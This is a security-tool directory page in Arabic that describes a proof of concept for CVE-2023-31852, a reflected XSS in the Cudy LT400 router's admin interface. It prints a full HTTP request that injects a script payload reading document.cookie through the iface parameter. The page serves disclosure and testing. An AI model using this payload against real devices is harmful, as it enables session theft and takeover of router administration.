Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-31852 — إثبات المفهوم لـ XSS المنعكس في واجهة الإدارة المستندة إلى الويب لجهاز Cudy LT400، مما يتيح سرقة رمز الجلسة والاستيلاء على صلاحيات المدير عبر طلبات مصممة خصيصًا إلى /cgi-bin/luci/admin/network/wireless/config. | Kitploit
أدوات/GitHubGitHub/calfcrusher/cve-2023-31852
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubcalfcrusher/cve-2023-31852

CVE-2023-31852

إثبات المفهوم لـ XSS المنعكس في واجهة الإدارة المستندة إلى الويب لجهاز Cudy LT400، مما يتيح سرقة رمز الجلسة والاستيلاء على صلاحيات المدير عبر طلبات مصممة خصيصًا إلى /cgi-bin/luci/admin/network/wireless/config.

عرض المستودع
منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-31852

توجد ثغرة من نوع هجوم البرمجة النصية عبر المواقع (XSS) المنعكس في واجهة الإدارة المستندة إلى الويب لجهاز Cudy LT400.

تحتوي الصفحة /cgi-bin/luci/admin/network/wireless/config على XSS منعكس عبر معامل iface.

تتضمن طرق الاستغلال إرسال طلب مصمم خصيصًا للضحية يتضمن تعليمات برمجية ضارة.

التطبيق المتأثر لا يضبط ملف تعريف الارتباط للجلسة مع خاصية HttpOnly؛ قد يؤدي ذلك إلى الاستيلاء على صلاحيات المسؤول عبر سرقة رمز الجلسة.

إثبات المفهوم

root@kitploit:~
GET /cgi-bin/luci/admin/network/wireless/config?nomodal=&iface=wlan00%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3e HTTP/1.1
Host: 172.16.1.1
User-Agent: Mozilla/5.0
Accept: text/html, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://172.16.1.1/cgi-bin/luci/admin/setup
Cookie: sysauth=REDACTED

البائع

Shenzhen Cudy Technology

مرجع CVE

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31852

مرجع المنتج

https://www.cudy.com

تنزيل الأداة